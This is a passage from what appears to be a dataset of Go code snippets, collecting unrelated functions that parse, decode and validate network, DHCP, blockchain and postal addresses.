{\n\t\treturn err\n\t}\n\to.Flag = uint32(val)\n\to.uuid = sa[6]\n\treturn nil\n}", "func AddressToIp(addr *pb.Address) net.IP {\n\tswitch a := addr.AddressVariant.(type) {\n\tcase *pb.Address_Ipv4:\n\t\treturn Int32ToIp(a.Ipv4)\n\tcase *pb.Address_Ipv6:\n\t\treturn BytesToIp(a.Ipv6)\n\tcase *pb.Address_Port:\n\t\treturn nil\n\tdefault:\n\t\treturn nil\n\t}\n}", "func (_LvRecording *LvRecordingFilterer) ParseLogAddress(log types.Log) (*LvRecordingLogAddress, error) {\n\tevent := new(LvRecordingLogAddress)\n\tif err := _LvRecording.contract.UnpackLog(event, \"LogAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func ParseAddress(address string) (string, string) {\n\tsplit := strings.Split(address, \":\")\n\tip := split[0]\n\tport := split[1]\n\n\treturn ip, port\n}", "func Address(a string) Option {\n\treturn func(o *Options) {\n\t\to.Address = a\n\t}\n}", "func (s *OpenconfigInterfaces_Interfaces_Interface_Tunnel_Ipv6_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_Tunnel_Ipv6_Addresses_Address\"], s, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func addressFromBytes(b []byte) (Address, error) {\n\ta := Address{}\n\tkeyLen := len(a.Key)\n\tif len(b) != keyLen+len(a.Checksum)+1 {\n\t\treturn a, errors.New(\"Invalid address bytes\")\n\t}\n\tcopy(a.Key[:], b[:keyLen])\n\ta.Version = b[keyLen]\n\tcopy(a.Checksum[:], b[keyLen+1:])\n\tif !a.HasValidChecksum() {\n\t\treturn a, errors.New(\"Invalid checksum\")\n\t} else {\n\t\treturn a, nil\n\t}\n}", "func ParseAddress(address string) (*ParsedAddress, error) {\n\taddressParts := &ParsedAddress{}\n\taddressList := strings.Split(address, \"/\")\n\tif len(addressList) != 3 {\n\t\treturn addressParts, logThenErrorf(\"invalid address string %s\", address)\n\t}\n\n\taddressParts = &ParsedAddress{\n\t\tLocationSegment: addressList[0],\n\t\tNetworkSegment: addressList[1],\n\t\tViewSegment: addressList[2],\n\t}\n\n\treturn addressParts, nil\n}", "func (_Node *NodeFilterer) ParseLogAddress(log types.Log) (*NodeLogAddress, error) {\n\tevent := new(NodeLogAddress)\n\tif err := _Node.contract.UnpackLog(event, \"LogAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func parseOptClientLinkLayerAddress(data []byte) (*optClientLinkLayerAddress, error) {\n\tvar opt optClientLinkLayerAddress\n\tbuf := uio.NewBigEndianBuffer(data)\n\topt.LinkLayerType = iana.HWType(buf.Read16())\n\topt.LinkLayerAddress = buf.ReadAll()\n\treturn &opt, buf.FinError()\n}", "func (op *OptVendorOpts) FromBytes(data []byte) error {\n\tbuf := uio.NewBigEndianBuffer(data)\n\top.EnterpriseNumber = buf.Read32()\n\tif err := op.VendorOpts.FromBytesWithParser(buf.ReadAll(), vendParseOption); err != nil {\n\t\treturn err\n\t}\n\treturn buf.FinError()\n}", "func (_LvRecordableStream *LvRecordableStreamFilterer) ParseLogAddress(log types.Log) (*LvRecordableStreamLogAddress, error) {\n\tevent := new(LvRecordableStreamLogAddress)\n\tif err := _LvRecordableStream.contract.UnpackLog(event, \"LogAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func (s *OpenconfigInterfaces_Interfaces_Interface_Tunnel_Ipv4_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_Tunnel_Ipv4_Addresses_Address\"], s, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (_Content *ContentFilterer) ParseLogAddress(log types.Log) (*ContentLogAddress, error) {\n\tevent := new(ContentLogAddress)\n\tif err := _Content.contract.UnpackLog(event, \"LogAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func NewFromCashAddress(addr *cashaddress.Address) (*Address, error) {\n\tvar network = MainNet\n\tvar addrtype = P2SH\n\n\tswitch addr.Prefix {\n\tcase cashaddress.MainNet:\n\t\tnetwork = MainNet\n\tcase cashaddress.TestNet:\n\t\tnetwork = TestNet\n\tcase cashaddress.RegTest:\n\t\tnetwork = RegTest\n\tdefault:\n\t\treturn nil, errors.New(\"invalid address network\")\n\t}\n\n\tswitch addr.Version {\n\tcase cashaddress.P2KH:\n\t\taddrtype = P2KH\n\tcase cashaddress.P2SH:\n\t\taddrtype = P2SH\n\tdefault:\n\t\treturn nil, errors.New(\"invalid address type\")\n\t}\n\n\treturn &Address{\n\t\tNetwork: network,\n\t\tVersion: addrtype,\n\t\tPayload: addr.Payload,\n\t}, nil\n}", "func FromAddress(address string) interop.Hash160 {\n\treturn nil\n}", "func AddressParserParse(p *mail.AddressParser, address string) (*mail.Address, error)", "func ParseFromIP(ip *net.IP) (*IPv4Address, *IPv6Address, error) {\n\tif ip == nil {\n\t\treturn nil, nil, fmt.Errorf(\"Nil address: %v\", ip)\n\t}\n\n\tif v4Addr := ip.To4(); v4Addr != nil {\n\t\tret := NewIPv4AddressFromBytes(v4Addr, 32)\n\t\treturn &ret, nil, nil\n\t}\n\tif v6Addr := ip.To16(); v6Addr != nil {\n\t\tret := NewIPv6Address(v6Addr, 128)\n\t\treturn nil, &ret, nil\n\t}\n\n\treturn nil, nil, fmt.Errorf(\"couldn't parse either v4 or v6 address: %v\", ip)\n}", "func AsAddr(addr wallet.Address) (*Address, error) {\n\ta, ok := addr.(*Address)\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"invalid type: %T\", addr)\n\t}\n\treturn a, nil\n}", "func readAddr(r io.Reader, b []byte) (Addr, error) {\n\tif len(b) < MaxAddrLen {\n\t\treturn nil, io.ErrShortBuffer\n\t}\n\t_, err := io.ReadFull(r, b[:1]) // read 1st byte for address type\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tswitch b[0] {\n\tcase AtypIPv4:\n\t\t_, err = io.ReadFull(r, b[1:1+net.IPv4len+2])\n\t\treturn b[:1+net.IPv4len+2], err\n\tcase AtypDomainName:\n\t\t_, err = io.ReadFull(r, b[1:2]) // read 2nd byte for domain length\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t_, err = io.ReadFull(r, b[2:2+int(b[1])+2])\n\t\treturn b[:1+1+int(b[1])+2], err\n\tcase AtypIPv6:\n\t\t_, err = io.ReadFull(r, b[1:1+net.IPv6len+2])\n\t\treturn b[:1+net.IPv6len+2], err\n\t}\n\n\treturn nil, ErrAddressNotSupported\n}", "func DecodeRawAddress(s []byte) (Address, error) {\n\tif len(s) == 0 {\n\t\treturn nil, errors.New(\"empty address\")\n\t}\n\n\theader := s[0]\n\tnetwork := Network(header & 0x0f)\n\n\treadAddrCred := func(bit byte, pos int) StakeCredential {\n\t\thashBytes := s[pos : pos+Hash28Size]\n\t\tif header&(1<<bit) == 0 {\n\t\t\treturn StakeCredential{Kind: KeyStakeCredentialType, Data: hashBytes}\n\t\t}\n\t\treturn StakeCredential{Kind: ScriptStakeCredentialype, Data: hashBytes}\n\t}\n\n\tswitch (header & 0xf0) >> 4 {\n\t// Base type\n\tcase 0b0000, 0b0001, 0b0010, 0b0011:\n\t\t// header + keyhash\n\t\tif len(s) != 57 {\n\t\t\treturn nil, errors.New(\"Invalid length for base address\")\n\t\t}\n\t\treturn &BaseAddress{Network: network, Payment: readAddrCred(4, 1),\n\t\t\tStake: readAddrCred(5, Hash28Size+1)}, nil\n\t// Pointer type\n\tcase 0b0100, 0b0101:\n\t\t// header + keyhash + 3 natural numbers (min 1 byte each)\n\t\tif len(s) < 32 {\n\t\t\treturn nil, errors.New(\"Invalid length for pointer address\")\n\t\t}\n\t\tbyteIndex := 1\n\t\tpaymentCred := readAddrCred(4, 1)\n\t\tslot, slotBytes, ok := VariableNatDecode(s[byteIndex:])\n\t\tif !ok {\n\t\t\treturn nil, errors.New(\"slot variable decode failed\")\n\t\t}\n\t\tbyteIndex += slotBytes\n\n\t\ttxIndex, txBytes, ok := VariableNatDecode(s[byteIndex:])\n\t\tif !ok {\n\t\t\treturn nil, errors.New(\"txIndex variable decode failed\")\n\t\t}\n\t\tbyteIndex += txBytes\n\n\t\tcertIndex, certBytes, ok := VariableNatDecode(s[byteIndex:])\n\t\tif !ok {\n\t\t\treturn nil, errors.New(\"certIndex variable decode failed\")\n\t\t}\n\t\tbyteIndex += certBytes\n\n\t\tif byteIndex > len(s) {\n\t\t\treturn nil, errors.New(\"byte index is out range of pointer lenght\")\n\t\t}\n\n\t\treturn &PointerAddress{\n\t\t\tNetwork: network, Payment: paymentCred,\n\t\t\tStake: StakePoint{Slot: slot, TxIndex: txIndex, CertIndex: certIndex},\n\t\t}, nil\n\t// Enterprise type\n\tcase 0b0110, 0b0111:\n\t\t// header + keyhash\n\t\tif len(s) != 29 {\n\t\t\treturn nil, errors.New(\"invalid length for enterprise address\")\n\t\t}\n\t\treturn &EnterpriseAddress{Network: network, Payment: readAddrCred(4, 1)}, nil\n\t// Reward type\n\tcase 0b1110, 0b1111:\n\t\tif len(s) != 29 {\n\t\t\treturn nil, errors.New(\"invalid length for reward address\")\n\t\t}\n\t\treturn &Reward{Network: network, Payment: readAddrCred(4, 1)}, nil\n\t// Legacy byron type\n\tcase 0b1000:\n\t\tvar byron LegacyAddress\n\t\tif err := cbor.Unmarshal(s, &byron); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn &byron, nil\n\t}\n\treturn nil, errors.New(\"unsupports address type\")\n}", "func (_LvStreamRightsHolder *LvStreamRightsHolderFilterer) ParseLogAddress(log types.Log) (*LvStreamRightsHolderLogAddress, error) {\n\tevent := new(LvStreamRightsHolderLogAddress)\n\tif err := _LvStreamRightsHolder.contract.UnpackLog(event, \"LogAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func (s *OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv6_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv6_Addresses_Address\"], s, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (_BaseAccessWallet *BaseAccessWalletFilterer) ParseDbgAddress(log types.Log) (*BaseAccessWalletDbgAddress, error) {\n\tevent := new(BaseAccessWalletDbgAddress)\n\tif err := _BaseAccessWallet.contract.UnpackLog(event, \"dbgAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func DecodeAddr(address []byte) string {\n\tvar stringAddr string\n\tvar ip []byte\n\tvar port []byte\n\n\tip = address[:4]\n\tport = address[4:]\n\n\t// Decode IP\n\tfor index, octet := range ip {\n\t\tstringAddr = stringAddr + strconv.Itoa(int(octet))\n\t\tif index != 3 {\n\t\t\tstringAddr += \".\"\n\t\t}\n\t}\n\tstringAddr += \":\"\n\n\t// Decode Port\n\tb := make([]byte, 8)\n\tfor i := 0; i < 6; i++ {\n\t\tb[i] = byte(0)\n\t}\n\tb[6] = port[0]\n\tb[7] = port[1]\n\tp := binary.BigEndian.Uint64(b)\n\tstringAddr += strconv.FormatUint(p, 10)\n\t//fmt.Println(\"Complete IP:\", stringAddr)\n\treturn stringAddr\n}", "func UserAddressFromAddress(a Address) *UserAddress {\n\tvar streetNum, streetName string\n\tparts := strings.Split(a.LineOne(), \" \")\n\n\tif _, err := strconv.Atoi(parts[0]); err == nil {\n\t\tstreetNum = parts[0]\n\t}\n\tstreetName = strings.Join(parts[1:], \" \")\n\n\tif addr, ok := a.(*UserAddress); ok {\n\t\tif len(addr.StreetNumber) == 0 {\n\t\t\taddr.StreetNumber = streetNum\n\t\t}\n\t\tif len(addr.StreetName) == 0 {\n\t\t\taddr.StreetName = streetName\n\t\t}\n\t\treturn addr\n\t}\n\n\treturn &UserAddress{\n\t\tStreet: a.LineOne(),\n\t\tStreetNumber: streetNum,\n\t\tStreetName: streetName,\n\t\tCityName: a.City(),\n\t\tPostalCode: a.Zip(),\n\t\tRegion: a.StateCode(),\n\t}\n}", "func (t *OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv6_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv6_Addresses_Address\"], t, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func AddressFromBytes(buf []byte) (Address, error) {\n\tif 8 != len(buf) {\n\t\treturn Address(0), errors.New(\"onewire: invalid buffer length\")\n\t}\n\tcrc := Crc8(buf[:7])\n\tif buf[7] != crc {\n\t\treturn 0, errors.New(\"onewire: invalid crc\")\n\t}\n\n\treturn Address(binary.BigEndian.Uint64(buf)), nil\n}", "func DecodeAddress(raw string) (res Address, err error) {\n\tvar rbytes []byte\n\tvar prefix string\n\n\tif strings.HasPrefix(raw, B32Prefix) || strings.HasPrefix(raw, StakePrefix) {\n\t\tprefix, rbytes, err = bech32.Decode(raw)\n\t} else {\n\t\trbytes, err = base58.Decode(raw)\n\t}\n\n\tif err != nil {\n\t\treturn\n\t}\n\n\tres, err = DecodeRawAddress(rbytes)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif p := res.Prefix(); p != prefix {\n\t\terr = errors.New(\"invalid address prefix\")\n\t}\n\n\treturn\n}", "func (op *OptNetworkInterfaceID) FromBytes(data []byte) error {\n\tbuf := uio.NewBigEndianBuffer(data)\n\top.Typ = NetworkInterfaceType(buf.Read8())\n\top.Major = buf.Read8()\n\top.Minor = buf.Read8()\n\treturn buf.FinError()\n}", "func (_BaseAccessControlGroup *BaseAccessControlGroupFilterer) ParseDbgAddress(log types.Log) (*BaseAccessControlGroupDbgAddress, error) {\n\tevent := new(BaseAccessControlGroupDbgAddress)\n\tif err := _BaseAccessControlGroup.contract.UnpackLog(event, \"dbgAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func ParseDevAddr(input string) (addr DevAddr, err error) {\n\tbytes, err := ParseHEX(input, 4)\n\tif err != nil {\n\t\treturn\n\t}\n\tcopy(addr[:], bytes)\n\treturn\n}", "func ParseAddress(address string) (*mail.Address, error)", "func HexToAddress(s string) Address { return BytesToAddress(FromHex(s)) }", "func HexToAddress(s string) types.Address { return BytesToAddress(FromHex(s)) }", "func (in *ActionUserRequestChangeResolveInput) SetAddress(value string) *ActionUserRequestChangeResolveInput {\n\tin.Address = value\n\n\tif in._selectedParameters == nil {\n\t\tin._selectedParameters = make(map[string]interface{})\n\t}\n\n\tin._selectedParameters[\"Address\"] = nil\n\treturn in\n}", "func ParseAdvertiseAddr(advertiseIP string) (string, string, error) {\n\tadvertiseIP = strings.TrimSpace(advertiseIP)\n\thost := advertiseIP\n\tport := \"\"\n\tif len(net.ParseIP(host)) == 0 && strings.Contains(advertiseIP, \":\") {\n\t\tvar err error\n\t\thost, port, err = net.SplitHostPort(advertiseIP)\n\t\tif err != nil {\n\t\t\treturn \"\", \"\", trace.BadParameter(\"failed to parse address %q\", advertiseIP)\n\t\t}\n\t\tif _, err := strconv.Atoi(port); err != nil {\n\t\t\treturn \"\", \"\", trace.BadParameter(\"bad port %q, expected integer\", port)\n\t\t}\n\t\tif host == \"\" {\n\t\t\treturn \"\", \"\", trace.BadParameter(\"missing host parameter\")\n\t\t}\n\t}\n\tip := net.ParseIP(host)\n\tif len(ip) != 0 {\n\t\tif ip.IsUnspecified() || ip.IsMulticast() {\n\t\t\treturn \"\", \"\", trace.BadParameter(\"unreachable advertise IP: %v\", advertiseIP)\n\t\t}\n\t}\n\treturn host, port, nil\n}", "func FromAddress(c *cli.Context) models.Address {\n\treturn models.Address{\n\t\tName: c.String(\"from-name\"),\n\t\tStreet: c.String(\"from-address\"),\n\t\tCity: c.String(\"from-city\"),\n\t\tState: c.String(\"from-state\"),\n\t\tZip: c.String(\"from-zip\"),\n\t\tCountry: c.String(\"from-country\"),\n\t}\n}", "func (s *OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv4_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv4_Addresses_Address\"], s, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func parseEPRTtoAddr(line string) (string, string, error) {\n\taddr := strings.Split(line, \"|\")\n\n\tif len(addr) != 5 {\n\t\treturn \"\", \"\", fmt.Errorf(\"invalid data address\")\n\t}\n\n\tnetProtocol := addr[1]\n\tIP := addr[2]\n\n\t// check port is valid\n\tport := addr[3]\n\tif integerPort, err := strconv.Atoi(port); err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"invalid data address\")\n\t} else if integerPort <= 0 || integerPort > 65535 {\n\t\treturn \"\", \"\", fmt.Errorf(\"invalid data address\")\n\t}\n\n\tswitch netProtocol {\n\tcase \"1\", \"2\":\n\t\t// use protocol 1 means IPv4. 2 means IPv6\n\t\t// net.ParseIP for validate IP\n\t\tif net.ParseIP(IP) == nil {\n\t\t\treturn \"\", \"\", fmt.Errorf(\"invalid data address\")\n\t\t}\n\t\tbreak\n\tdefault:\n\t\t// wrong network protocol\n\t\treturn \"\", \"\", fmt.Errorf(\"unknown network protocol\")\n\t}\n\n\treturn IP, port, nil\n}", "func ParsePciAddress(pciAddress string) ([]string, error) {\n\tpciAddrRegx, err := regexp.Compile(PCI_ADDRESS_PATTERN)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to compile pci address pattern, %v\", err)\n\t}\n\tres := pciAddrRegx.FindStringSubmatch(pciAddress)\n\tif len(res) == 0 {\n\t\treturn nil, fmt.Errorf(\"failed to parse pci address %s\", pciAddress)\n\t}\n\treturn res[1:], nil\n}", "func (i *IATA) UnmarshalBinary(b []byte) error {\n\t// IATA must contain at least an IAID.\n\tif len(b) < 4 {\n\t\treturn io.ErrUnexpectedEOF\n\t}\n\n\tiaid := [4]byte{}\n\tcopy(iaid[:], b[0:4])\n\ti.IAID = iaid\n\n\toptions, err := parseOptions(b[4:])\n\tif err != nil {\n\t\treturn err\n\t}\n\ti.Options = options\n\n\treturn nil\n}", "func marshallAbiAddress(value interface{}) (string, error) {\n\tabiType, err := abi.TypeOf(\"address\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tencoded, err := abiType.Encode(value)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdecoded, err := abiType.Decode(encoded)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tmarshalledValue, ok := decoded.([]byte)\n\tif !ok || len(marshalledValue) != len(types.ZeroAddress) {\n\t\terr = fmt.Errorf(\"Decoded value is not a 32 length byte slice\")\n\t}\n\tvar addressValue types.Address\n\tcopy(addressValue[:], marshalledValue)\n\treturn addressValue.String(), err\n}", "func (addr *Address) Unmarshal(buf []byte, rem int) ([]byte, int, error) {\n\tvar err error\n\tbuf, rem, err = surge.UnmarshalU8((*uint8)(&addr.Protocol), buf, rem)\n\tif err != nil {\n\t\treturn buf, rem, err\n\t}\n\tbuf, rem, err = surge.UnmarshalString(&addr.Value, buf, rem)\n\tif err != nil {\n\t\treturn buf, rem, err\n\t}\n\tbuf, rem, err = surge.UnmarshalU64(&addr.Nonce, buf, rem)\n\tif err != nil {\n\t\treturn buf, rem, err\n\t}\n\treturn addr.Signature.Unmarshal(buf, rem)\n}", "func WithAddress(address string) Option {\n\treturn addressOption(address)\n}", "func WithAddress(addr string) Option {\n\treturn addrOption{address: addr}\n}", "func FromBytes(q []byte) (*DHCPv4, error) {\n\tvar p DHCPv4\n\tbuf := uio.NewBigEndianBuffer(q)\n\n\tp.OpCode = OpcodeType(buf.Read8())\n\tp.HWType = iana.HWType(buf.Read8())\n\n\thwAddrLen := buf.Read8()\n\n\tp.HopCount = buf.Read8()\n\tbuf.ReadBytes(p.TransactionID[:])\n\tp.NumSeconds = buf.Read16()\n\tp.Flags = buf.Read16()\n\n\tp.ClientIPAddr = net.IP(buf.CopyN(net.IPv4len))\n\tp.YourIPAddr = net.IP(buf.CopyN(net.IPv4len))\n\tp.ServerIPAddr = net.IP(buf.CopyN(net.IPv4len))\n\tp.GatewayIPAddr = net.IP(buf.CopyN(net.IPv4len))\n\n\tif hwAddrLen > 16 {\n\t\thwAddrLen = 16\n\t}\n\t// Always read 16 bytes, but only use hwaddrlen of them.\n\tp.ClientHWAddr = make(net.HardwareAddr, 16)\n\tbuf.ReadBytes(p.ClientHWAddr)\n\tp.ClientHWAddr = p.ClientHWAddr[:hwAddrLen]\n\n\tvar sname [64]byte\n\tbuf.ReadBytes(sname[:])\n\tlength := strings.Index(string(sname[:]), \"\\x00\")\n\tif length == -1 {\n\t\tlength = 64\n\t}\n\tp.ServerHostName = string(sname[:length])\n\n\tvar file [128]byte\n\tbuf.ReadBytes(file[:])\n\tlength = strings.Index(string(file[:]), \"\\x00\")\n\tif length == -1 {\n\t\tlength = 128\n\t}\n\tp.BootFileName = string(file[:length])\n\n\tvar cookie [4]byte\n\tbuf.ReadBytes(cookie[:])\n\n\tif err := buf.Error(); err != nil {\n\t\treturn nil, err\n\t}\n\tif cookie != magicCookie {\n\t\treturn nil, fmt.Errorf(\"malformed DHCP packet: got magic cookie %v, want %v\", cookie[:], magicCookie[:])\n\t}\n\n\tp.Options = make(Options)\n\tif err := p.Options.fromBytesCheckEnd(buf.Data(), true); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &p, nil\n}", "func (t *OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv4_Addresses_Address) Validate(opts ...ygot.ValidationOption) error {\n\tif err := ytypes.Validate(SchemaTree[\"OpenconfigInterfaces_Interfaces_Interface_RoutedVlan_Ipv4_Addresses_Address\"], t, opts...); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (b *Backend) ParseAddress(addr string) (err error) {\n\tif b.Addr, err = url.Parse(addr); err != nil {\n\t\treturn err\n\t}\n\n\tif b.Addr.Scheme == \"\" {\n\t\tb.Addr.Scheme = \"http\"\n\t}\n\n\thttps := b.Addr.Scheme == \"https\"\n\tb.Host = b.Addr.Host\n\n\tif b.Addr.Port() == \"\" {\n\t\tif https {\n\t\t\tb.Host += \":443\"\n\t\t} else {\n\t\t\tb.Host += \":80\"\n\t\t}\n\t}\n\n\treturn nil\n}", "func BytesToAddress(b []byte) Address {\n\tvar a Address\n\tif len(b) > AddressLength {\n\t\tb = b[len(b)-AddressLength:]\n\t}\n\tcopy(a[AddressLength-len(b):], b)\n\treturn a\n}", "func (a *Address) UnmarshalJSON(buf []byte) (err error) {\n\tstr := string(buf[1 : len(buf)-1])\n\t_, _, err = ParseAddrPort(str)\n\tif err == nil {\n\t\t*a = Address(str)\n\t}\n\treturn\n}", "func NewAddressFromHex(str string) (*Address, error) {\n\tif len(str) != 42 || str[:2] != \"0x\" {\n\t\treturn nil, errors.New(\"Address must be chars 40 hex strings prefixed with 0x\")\n\t}\n\tbytes, err := hex.DecodeString(str[2:])\n\tif err != nil {\n\t\treturn nil, errors.WithMessage(err, \"parsing address as hexadecimal\")\n\t}\n\tvar a common.Address\n\tcopy(a[:], bytes)\n\treturn &Address{wallet.Address(a)}, nil\n}", "func ValidateAddress(address string) error {\n\tif !common.IsHexAddress(address) {\n\t\treturn sdkerrors.Wrapf(\n\t\t\tsdkerrors.ErrInvalidAddress, \"address '%s' is not a valid ethereum hex address\",\n\t\t\taddress,\n\t\t)\n\t}\n\treturn nil\n}", "func TestNewIAAddr(t *testing.T) {\n\tvar tests = []struct {\n\t\tdesc string\n\t\tip net.IP\n\t\tpreferred time.Duration\n\t\tvalid time.Duration\n\t\toptions dhcp6.Options\n\t\tiaaddr *IAAddr\n\t\terr error\n\t}{\n\t\t{\n\t\t\tdesc: \"all zero values\",\n\t\t\tiaaddr: &IAAddr{},\n\t\t},\n\t\t{\n\t\t\tdesc: \"IPv4 address\",\n\t\t\tip: net.IP([]byte{192, 168, 1, 1}),\n\t\t\terr: ErrInvalidIP,\n\t\t},\n\t\t{\n\t\t\tdesc: \"preferred greater than valid lifetime\",\n\t\t\tip: net.IPv6loopback,\n\t\t\tpreferred: 2 * time.Second,\n\t\t\tvalid: 1 * time.Second,\n\t\t\terr: ErrInvalidLifetimes,\n\t\t},\n\t\t{\n\t\t\tdesc: \"IPv6 localhost, 1s preferred, 2s valid, no options\",\n\t\t\tip: net.IPv6loopback,\n\t\t\tpreferred: 1 * time.Second,\n\t\t\tvalid: 2 * time.Second,\n\t\t\tiaaddr: &IAAddr{\n\t\t\t\tIP: net.IPv6loopback,\n\t\t\t\tPreferredLifetime: 1 * time.Second,\n\t\t\t\tValidLifetime: 2 * time.Second,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tdesc: \"IPv6 localhost, 1s preferred, 2s valid, option client ID [0 1]\",\n\t\t\tip: net.IPv6loopback,\n\t\t\tpreferred: 1 * time.Second,\n\t\t\tvalid: 2 * time.Second,\n\t\t\toptions: dhcp6.Options{\n\t\t\t\tdhcp6.OptionClientID: [][]byte{{0, 1}},\n\t\t\t},\n\t\t\tiaaddr: &IAAddr{\n\t\t\t\tIP: net.IPv6loopback,\n\t\t\t\tPreferredLifetime: 1 * time.Second,\n\t\t\t\tValidLifetime: 2 * time.Second,\n\t\t\t\tOptions: dhcp6.Options{\n\t\t\t\t\tdhcp6.OptionClientID: [][]byte{{0, 1}},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tfor i, tt := range tests {\n\t\tiaaddr, err := NewIAAddr(tt.ip, tt.preferred, tt.valid, tt.options)\n\t\tif err != nil {\n\t\t\tif want, got := tt.err, err; want != got {\n\t\t\t\tt.Fatalf(\"[%02d] test %q, unexpected error for NewIAAddr: %v != %v\",\n\t\t\t\t\ti, tt.desc, want, got)\n\t\t\t}\n\n\t\t\tcontinue\n\t\t}\n\n\t\twant, err := tt.iaaddr.MarshalBinary()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tgot, err := iaaddr.MarshalBinary()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tif !bytes.Equal(want, got) {\n\t\t\tt.Fatalf(\"[%02d] test %q, unexpected IAAddr bytes:\\n- want: %v\\n- got: %v\",\n\t\t\t\ti, tt.desc, want, got)\n\t\t}\n\t}\n}", "func decodeAddress(address string, cfg *chaincfg.Params) (btcutil.Address, error) {\n\tdecodedAddress, err := btcutil.DecodeAddress(address, cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn decodedAddress, nil\n}", "func (_AccessIndexor *AccessIndexorFilterer) ParseDbgAddress(log types.Log) (*AccessIndexorDbgAddress, error) {\n\tevent := new(AccessIndexorDbgAddress)\n\tif err := _AccessIndexor.contract.UnpackLog(event, \"dbgAddress\", log); err != nil {\n\t\treturn nil, err\n\t}\n\tevent.Raw = log\n\treturn event, nil\n}", "func ExpandAddress(input []byte, options NormalizeOptions, n []uint) **byte {\n\tcinput, _ := (*C.char)(unsafe.Pointer((*sliceHeader)(unsafe.Pointer(&input)).Data)), cgoAllocsUnknown\n\tcoptions, _ := options.PassValue()\n\tcn, _ := (*C.size_t)(unsafe.Pointer((*sliceHeader)(unsafe.Pointer(&n)).Data)), cgoAllocsUnknown\n\t__ret := C.expand_address(cinput, coptions, cn)\n\t__v := *(***byte)(unsafe.Pointer(&__ret))\n\treturn __v\n}", "func IotxAddressToAddress(iotxRawAddr string) (Address, error) {\n\treturn V1.IotxAddressToAddress(iotxRawAddr)\n}", "func AddressDecode(dec *WasmDecoder) ScAddress {\n\taddr := ScAddress{}\n\tcopy(addr.id[:], dec.FixedBytes(ScAddressLength))\n\treturn addr\n}", "func BytesToAddress(b []byte) (Address, error) {\n\tif len(b) > AddressLength {\n\t\treturn Address{}, AddressOverflowError\n\t}\n\tvar a Address\n\ta.SetBytes(b)\n\treturn a, nil\n}", "func (g *Getter) decodeA(buf []byte, res string) (int, error) {\n\t/* Parse as an IP address */\n\tip := net.ParseIP(res)\n\tif nil == ip {\n\t\treturn 0, fmt.Errorf(\"invalid IP address %q\", res)\n\t}\n\t/* Parse with the appropriate length */\n\tvar plen, start int\n\tswitch g.Type {\n\tcase TypeA:\n\t\tip = ip.To4()\n\t\tplen = 4\n\t\tstart = 1\n\tcase TypeAAAA:\n\t\tip = ip.To16()\n\t\tplen = 16\n\t\tstart = 8\n\t}\n\t/* If we didn't get an address of the right size, someone goofed */\n\tif nil == ip {\n\t\treturn 0, fmt.Errorf(\"unable to parse IP address %s\", res)\n\t}\n\t/* Make sure we have enough buffer */\n\tif plen > len(buf) {\n\t\treturn 0, fmt.Errorf(\n\t\t\t\"buffer too small for record of type %s\",\n\t\t\tg.Type,\n\t\t)\n\t}\n\t/* Extract the payload */\n\treturn copy(buf, ip[start:]), nil\n}", "func (m *Message) AIP() (*AIP, error) {\n\tps, err := m.Parse(\"AIP\")\n\tpst, ok := ps.(*AIP)\n\tif ok {\n\t\treturn pst, err\n\t}\n\treturn nil, err\n}", "func (a *Address) UnmarshalJSON(input []byte) error {\n\treturn hexutil.UnmarshalFixedJSON(addressT, input, a[:])\n}", "func (a *Address) UnmarshalJSON(input []byte) error {\n\treturn hexutil.UnmarshalFixedJSON(addressT, input, a[:])\n}", "func 